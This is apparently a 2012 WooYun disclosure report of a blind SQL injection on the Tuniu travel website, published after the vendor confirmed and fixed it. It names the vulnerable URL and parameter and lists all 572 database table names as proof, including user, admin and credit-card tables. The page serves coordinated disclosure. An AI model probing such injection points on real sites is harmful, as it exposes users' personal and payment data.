当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013504

漏洞标题:途牛旅行网SQL注入漏洞可导致百万用户信息安全受威胁

相关厂商:途牛旅游网

漏洞作者: Hackx7

提交时间:2012-10-19 14:48

修复时间:2012-12-03 14:48

公开时间:2012-12-03 14:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-19: 细节已通知厂商并且等待厂商处理中
2012-10-19: 厂商已经确认,细节仅向厂商公开
2012-10-29: 细节向核心白帽子及相关领域专家公开
2012-11-08: 细节向普通白帽子公开
2012-11-18: 细节向实习白帽子公开
2012-12-03: 细节向公众公开

简要描述:

SQL注入漏洞,可以直接注入数据库所有内容

详细说明:

http://www.tuniu.com/main.php?do=route_ajax_new&date=&flag=2&cache=0.44604623204620797&route_id=76041
此为注入点 盲注入

漏洞证明:

这是数据库表结构,我没干坏事啊,只是检测
Database: tuniu
[572 tables]
+-----------------------------------+
| aboard_gro_order_extra |
| aboard_sin_order_extra |
| abroad_tip |
| access_log |
| activities |
| activities_classes |
| activities_pic_url |
| activity_hotel |
| activity_new |
| additional_products |
| admin_user |
| advise |
| agency |
| agency_popu |
| agency_popu_block |
| agency_popu_block_route |
| agency_record |
| agency_route_email |
| agency_show_web_info |
| air_lines |
| air_ports |
| answers |
| area |
| area_desc_category |
| area_description |
| area_hotel |
| ashore_tourism |
| asks_place |
| asks_weekstar |
| backpack_hotel |
| backpack_hotel_additional |
| backpack_hotel_agency_relation |
| backpack_hotel_cat |
| backpack_hotel_cat_relate |
| backpack_hotel_for_theme |
| backpack_hotel_order |
| backpack_hotel_package |
| backpack_hotel_photo |
| backpack_hotel_room |
| backpack_hotel_room_plan |
| backpack_hotel_taocan |
| backpack_hotel_type |
| backpack_hotel_type_relate |
| backpack_online_order |
| backpack_room_agency_relation |
| backpack_room_relation_plan |
| bank |
| bank_act |
| bank_note |
| book_city |
| book_email |
| bot_visit_log |
| bus_cat |
| bus_company |
| bus_line |
| bus_line_part |
| bus_station |
| bus_station_cat |
| calllog |
| campaign |
| campaign_balance |
| campaign_click_record |
| campaign_pay_record |
| campaign_record |
| cat_destination_relate |
| cat_group_hotel |
| cat_groups |
| cat_hot_route |
| cat_routes_change |
| cat_tag |
| channel_keyword |
| channel_visit_data |
| channel_visit_log |
| channels |
| charge_area |
| checi |
| checi_bak |
| christmas_click |
| christmas_contact |
| christmas_gift |
| city_info |
| city_station |
| city_station_bak |
| cmb_pay |
| comment_photos |
| comment_robot |
| comments_ask |
| comments_diss |
| comments_group |
| comments_place |
| comments_platter |
| comments_route |
| comments_route_agency |
| comments_user_photo |
| company_demand |
| company_tour |
| company_travel_schedule |
| conf |
| confirm_start_notice_email |
| contract_down_load |
| contracts |
| coupon |
| coupon_detail |
| coupon_log |
| coupon_total_ip |
| coupon_total_ip_all |
| crm_bug |
| crm_email |
| crm_file |
| crm_finance_invoice |
| crm_insure_tourist |
| crm_news |
| crm_rule |
| crm_saler_profit_log |
| crontab_sql |
| crontab_task |
| crontab_time |
| cvs |
| dali_vote |
| database_info |
| database_info_detail |
| date_online |
| departure |
| destination |
| destination_cat |
| destination_cat_bak |
| destination_cat_parent |
| destination_price_statistic |
| diss |
| diss_vote |
| ditie_route |
| ditie_station |
| ditie_station_line |
| domes_gr_order_extra |
| drequest |
| dujia_mudidi |
| dujia_mudidi_cat |
| duser |
| emotions |
| eticket |
| eticket_batch |
| eticket_config |
| eticket_express_list |
| eticket_express_price |
| eticket_name_config |
| eticket_price |
| eticket_price_config |
| eticket_relate_route |
| favorites_photo |
| finance_ips_pay_log |
| finance_kuaiqian_pay_apply_log |
| finance_kuaiqian_pay_log |
| flight_class_info |
| flight_info |
| flight_letter |
| fmis_invoice |
| fmis_invoice_apply |
| fmis_invoice_no |
| fmis_online_bank |
| fmis_online_bank_card |
| friends |
| global_log |
| group_code |
| group_code_parsed |
| group_code_temp |
| group_keywords |
| group_purchase_city_notice |
| group_purchase_product_routes |
| group_purchase_right_column |
| group_purchase_subscribe |
| group_sort |
| group_visit_history |
| groups |
| heartbeat |
| history |
| holiday_comment |
| holiday_place |
| holiday_place_config |
| holiday_place_photo |
| holiday_place_recommend |
| holiday_place_relate |
| hot_route |
| hot_route_new |
| hotel |
| hotel_area |
| hotel_flight_position |
| hotel_order |
| hotel_plan |
| hotel_relation |
| hotel_room |
| hotel_room_price |
| hotel_room_relation |
| hotel_route_relation |
| index_core_route |
| index_manage |
| index_manage_parsed |
| index_order_email |
| index_view_num |
| insurance_temp |
| invoice_tmp |
| ip_address |
| ip_address2 |
| ip_address2_old |
| ip_area |
| ip_log |
| ips_pay_log |
| jdv2_comment |
| jdv2_comment_check |
| jdv2_comment_data |
| labor_activity |
| labor_invite_friend |
| labor_prize |
| labor_prize_list |
| labor_qtmbb_prize |
| links |
| logs_baixingapi |
| long_bus_area |
| long_bus_cat |
| long_bus_cat_detail |
| long_bus_line |
| long_bus_station |
| maps |
| messages |
| messages_in |
| messages_out |
| messages_out_email |
| metro_comment |
| mobile |
| mobile_old |
| nation |
| nationality |
| net_address_template |
| net_order |
| net_order_address |
| net_order_pay_log |
| net_order_shop |
| net_order_shop_log |
| net_to_crm_pay_log |
| news |
| news_place |
| notes |
| online_confirm_file |
| online_pay_visit_log |
| operator_area |
| order_backpack_union |
| order_complaint |
| order_email |
| order_etickets |
| order_etickets_batch |
| order_etickets_customer |
| order_etickets_status |
| order_flights |
| order_holiday |
| order_hotel |
| order_insure |
| order_online_sign |
| order_position |
| order_promotion_event |
| order_recall |
| order_recall_2 |
| order_save_tmp |
| order_sign_choose |
| order_status_history |
| order_step |
| order_ticket |
| order_travel_person_num_7days |
| order_weiyi_cid |
| other_tours |
| other_tours_plan |
| p_agency |
| p_air_type |
| p_air_type_photo |
| p_airport |
| p_cabin |
| p_cabin_plan |
| p_flight |
| p_ticket |
| p_ticket_agency_relation |
| p_ticket_area |
| p_ticket_cabin |
| p_ticket_cat |
| p_ticket_plan |
| p_ticket_relation_plan |
| package_10_20_mapping |
| package_cat |
| package_hotel_tmp |
| package_info |
| package_new |
| package_roominfo_tmp |
| package_union |
| package_union_child |
| package_union_plan |
| package_union_total |
| packages |
| packages_detail |
| packages_hotel |
| packages_insure |
| packages_plan |
| packages_product |
| packages_schedule |
| partner_adv_doc |
| partner_adv_flash |
| partner_adv_pic |
| partner_coupon_exchange |
| partner_homepage_manage |
| partner_new_adv_doc |
| partner_new_adv_doc_cat |
| partner_new_adv_pic |
| partner_new_answer |
| partner_new_ask |
| partner_new_check_email |
| partner_new_commision |
| partner_new_letter |
| partner_new_letter_file |
| partner_new_pay |
| partner_new_pay_order |
| partner_new_photo |
| partner_new_pic_adv_photo |
| partner_pay |
| partner_reg |
| partners |
| partners_new |
| passage_cat |
| passage_kind |
| passage_list |
| passage_photo |
| passage_top |
| passages |
| phone_code |
| photos_diss |
| photos_flickr |
| place_area |
| place_books |
| place_description |
| place_everyday |
| place_judge |
| place_location |
| place_price |
| place_sort |
| place_visit_history |
| place_visit_history_200904 |
| place_visit_history_200905 |
| place_visit_history_200906 |
| place_vote_log |
| place_vote_name |
| places |
| planedata |
| planedata_desc |
| platters |
| platters_place |
| platters_tag |
| platters_vote |
| post_robot |
| posts_blog |
| posts_group |
| posts_group_category |
| posts_place |
| pre_sh5year_list |
| price_order |
| price_order_cat |
| product_act |
| product_cat_relate |
| product_comment |
| promotion_product |
| promotion_route_info |
| province_city |
| rates |
| refers |
| relate_link |
| route_agency_relation |
| route_cat_tag |
| route_comment_photos |
| route_destination |
| route_destination_tag |
| route_file |
| route_join_group |
| route_notice |
| route_place |
| route_place_agency |
| route_play_type |
| route_position |
| route_position_group |
| route_relate_ticket |
| route_schedule |
| route_special_area |
| route_special_manage |
| route_submit_error |
| route_tag_related_destination |
| route_theme_relate |
| route_visit_history |
| routes |
| routes_agency |
| routes_agency_addition |
| routes_agency_detail |
| routes_agency_from_external |
| routes_agency_log |
| routes_agency_plan |
| routes_agency_search |
| routes_agency_theme_cat |
| routes_agency_view_log |
| routes_cat |
| routes_coupon |
| routes_depart |
| routes_insure |
| routes_order |
| routes_plan |
| routes_product |
| routes_scheme |
| routes_scheme_plan |
| routes_theme |
| routes_union |
| routes_vote |
| salers |
| salers_change |
| sales_index |
| schedule_attraction |
| schedule_shop |
| schedules |
| schedules_agency |
| script_task |
| search_record |
| search_sum_history |
| seatprice |
| send_etickets_record |
| shop_info |
| shz_prize |
| shz_prize_list |
| site_classification |
| site_classification_other_info |
| site_classification_status_info |
| site_classification_tkd |
| site_classification_tkd_templates |
| site_group_code |
| sorts |
| special |
| special_place |
| special_post |
| special_route |
| sql_count |
| station |
| station_bak |
| stats_robot |
| sub_company_info |
| sub_sites |
| sub_sites_links |
| surcharge |
| survey |
| survey_answer |
| survey_m |
| system_code |
| tags_photo |
| tags_route |
| taobao_route_map |
| td_c_membcard_type |
| team_price_detail |
| team_price_general |
| team_refer_price |
| temp_channel |
| tf_c_cust_sysexten |
| tf_c_cust_userexten |
| tf_c_membship |
| tf_c_other_reg |
| tf_c_signoff_log |
| ticket_base |
| ticket_destinations |
| ticket_homepage_manage |
| ticket_info |
| ticket_order |
| ticket_order_detail |
| ticket_photo |
| ticket_place_lable |
| ticket_send |
| tips |
| tkt_info |
| tkt_scenic |
| tkt_scenic_photos |
| tn_cat |
| tn_cat_change |
| tn_cat_city |
| tn_routes_pos |
| tour_area_desc |
| tour_plan |
| tourist |
| tourist_hotel |
| tourist_order |
| tourist_order_status |
| tourist_plan |
| tourist_record |
| tourist_template |
| tourist_ticket |
| trace_log |
| train_lines |
| train_lines_part |
| train_stations |
| transfer_data |
| transfer_log |
| transfer_zt |
| travel_coupon |
| travel_coupon_use |
| travel_info |
| travel_info_detail |
| upload_file |
| upttdata_log |
| user_account |
| user_account_log |
| user_admin |
| user_admin_log |
| user_coin_log |
| user_consume |
| user_coupon |
| user_coupon_log |
| user_credit_card |
| user_finance_get_motopay |
| user_group |
| user_invitation |
| user_invite |
| user_niuren_uid |
| user_niuren_uid_ip |
| user_online |
| user_order |
| user_order_agreement |
| user_order_extra |
| user_order_flight |
| user_order_hotel |
| user_order_insurance |
| user_order_other |
| user_order_pay |
| user_order_pay_log |
| user_partner |
| user_photo |
| user_place |
| user_place_visit_history |
| user_report_error |
| user_route |
| user_route_visit_history |
| user_tenpay_log |
| user_web_order_pay |
| userlist |
| users |
| videos_place |
| visa |
| visa_content |
| visa_email |
| visa_file |
| visa_particular |
| visit_cat |
| visitor |
| visitor1 |
| vote_group |
| vote_group_log |
| weather |
| weather_cat |
| weather_city_code |
| weather_detail |
| weather_icon |
| weather_infos |
| weatherinfo_2011 |
| weatherinfo_2012 |
| weatherinfo_2013 |
| weatherinfo_2014 |
| weatherinfo_2015 |
| weatherinfo_2016 |
| weatherinfo_2017 |
| weatherinfo_2018 |
| weatherinfo_2019 |
| weatherinfo_2020 |
| web_model_res |
| wiki |
| wiki_entry |
| wiki_refer |
| wiki_tag |
| youlun_recommend |
+-----------------------------------+

修复方案:

程序员自己修复吧 我只负责报告漏洞
by H4ckx7

版权声明:转载请注明来源 Hackx7@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2012-10-19 15:10

厂商回复:

感谢Hackx7@乌云, 我们尽快修复

最新状态:

2012-10-19:已经修复 感谢


漏洞评价:

评论